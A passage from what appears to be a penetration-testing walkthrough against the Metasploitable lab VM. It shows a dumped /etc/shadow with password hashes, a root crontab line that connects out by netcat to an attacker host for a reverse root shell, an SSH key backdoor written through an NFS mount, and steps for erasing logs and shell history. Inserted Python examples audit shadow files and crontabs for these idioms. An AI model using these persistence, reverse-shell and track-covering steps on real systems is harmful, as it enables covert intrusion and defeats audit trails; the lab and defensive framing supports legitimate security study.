mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::
root@metasploitable:/# 
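An added example (not from the original post) that parses /etc/shadow entries and identifies the hash scheme from the $id$ prefix, so a defender auditing a host can spot accounts still using md5crypt or having no password at all. The sample input is constructed from a few lines of the dump above plus an invented empty-password account.

```python
import re

# Constructed sample in /etc/shadow format: the root, daemon, sys, libuuid and
# msfadmin lines are copied from the dump above; "guest" is invented to show
# the empty-password case.
SHADOW_SAMPLE = """\
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
libuuid:!:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
guest::14684:0:99999:7:::
"""

# crypt(3) scheme identifiers. $1$ is the MD5-based scheme the post calls MD5(Unix).
HASH_SCHEMES = {
    "1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt",
}
WEAK_SCHEMES = {"md5crypt", "descrypt"}


def classify_hash(field):
    """Name the scheme of one shadow password field."""
    if field == "":
        return "empty"          # account can log in with no password
    if field.startswith(("*", "!")):
        return "locked"         # no usable password (disabled or locked)
    m = re.match(r"^\$([^$]+)\$", field)
    if not m:
        return "descrypt"       # legacy 13-character DES crypt, no $id$ prefix
    return HASH_SCHEMES.get(m.group(1), "unknown($%s$)" % m.group(1))


def parse_shadow(text):
    """Return one dict per entry; a shadow line always has nine colon-separated fields."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError("malformed shadow line: %r" % line)
        entries.append({"user": fields[0], "hash": fields[1],
                        "scheme": classify_hash(fields[1])})
    return entries


def audit_shadow(text):
    """Return (user, finding) pairs a defender would act on."""
    findings = []
    for e in parse_shadow(text):
        if e["scheme"] == "empty":
            findings.append((e["user"], "empty password"))
        elif e["scheme"] in WEAK_SCHEMES:
            findings.append((e["user"], "weak hash scheme " + e["scheme"]))
    return findings
```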

Enable a Cron Job to run every 5 minutes

Using the line below we can set up a cron job that runs every 5 minutes and uses netcat to return a root shell. Open /etc/crontab on the Linux victim and paste the line at the end of the file. Save and exit, then restart the cron service with service cron restart. Now all you have to do is set up a netcat listener on your Kali machine to pick up the shell.

 */5 * * * * root nc 192.168.182.147 12345 -e /bin/bash 

This sets up the listener on the Kali machine to catch the shell:

nc -lvp 12345
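From the defender's side, an added example (not part of the original post) that parses a system crontab and flags jobs using the reverse-shell idioms this guide relies on. The sample crontab is constructed: two stock entries plus the line above.

```python
import re

# Constructed sample /etc/crontab in system format (5 time fields, user, command).
CRONTAB_SAMPLE = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || run-parts --report /etc/cron.daily
*/5 * * * * root nc 192.168.182.147 12345 -e /bin/bash
"""

# Reverse-shell idioms used in this guide: netcat with -e, bash's /dev/tcp
# pseudo-device, and an interactive bash started from a scheduled job.
SUSPICIOUS = [
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"), "netcat with -e (program on connect)"),
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp reverse shell"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash spawned from cron"),
]


def parse_system_crontab(text):
    """Return job dicts from a system crontab, skipping comments and variables."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue                      # blank, comment or environment assignment
        parts = line.split(None, 6)       # 5 schedule fields, user, rest is the command
        if len(parts) < 7:
            continue                      # not a complete job line
        jobs.append({"schedule": " ".join(parts[:5]),
                     "user": parts[5], "command": parts[6]})
    return jobs


def audit_crontab(text):
    """Return (user, schedule, reason) for each job matching a suspicious idiom."""
    findings = []
    for job in parse_system_crontab(text):
        for pattern, reason in SUSPICIOUS:
            if pattern.search(job["command"]):
                findings.append((job["user"], job["schedule"], reason))
                break
    return findings
```

The same check applies to per-user crontabs once the user column is dropped, and to files under /etc/cron.d, which use the system format.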

Adding a SSH key on the Server for future use

Since the NFS mount gives us write access to the server's root .ssh directory, I will generate my own SSH key pair with ssh-keygen and append the public key to Metasploitable's authorized_keys file with the command
cat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys

root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
e7:89:5d:df:ec:86:ec:88:18:ab:7c:ea:67:d3:c7:49 root@kali
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|                 |
|                 |
|                 |
|        S . .    |
|         = oE. o |
|        o.+o o..o|
|     .  =+..+.o..|
|     .=*o........|
+-----------------+
root@kali:~# cat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys

We can now authenticate to the server as root without a password, and I can come back to it at any time without password authentication.

root@kali:~# ssh root@192.168.182.150
Last login: Sat Feb  4 15:56:27 2017 from 192.168.182.147
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# 
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~# hostname
metasploitable
root@metasploitable:~# 

Covering Tracks

Clear Event Logs

Using kwrite, edit, vi or another editor, open the file /var/log/messages. From there you can delete the entries related to your compromise of the system, or delete all the entries if you like.

Clearing terminal history

You can clear your current session's bash history with the command history -c.

You can also remove the .bash_history file on the victim's machine to delete all the saved history.

rm ~/.bash_history

Conclusion

Metasploitable provides common vulnerabilities and a VM on which we can test penetration techniques; however, this is just a start for those interested in learning about penetration testing. Later on I will exploit other vulnerable VMs from Vulnhub and Pentester Labs.

Note: I will continue to add to this guide over time. If you have any comments, questions, or other topics you would like me to cover, let me know.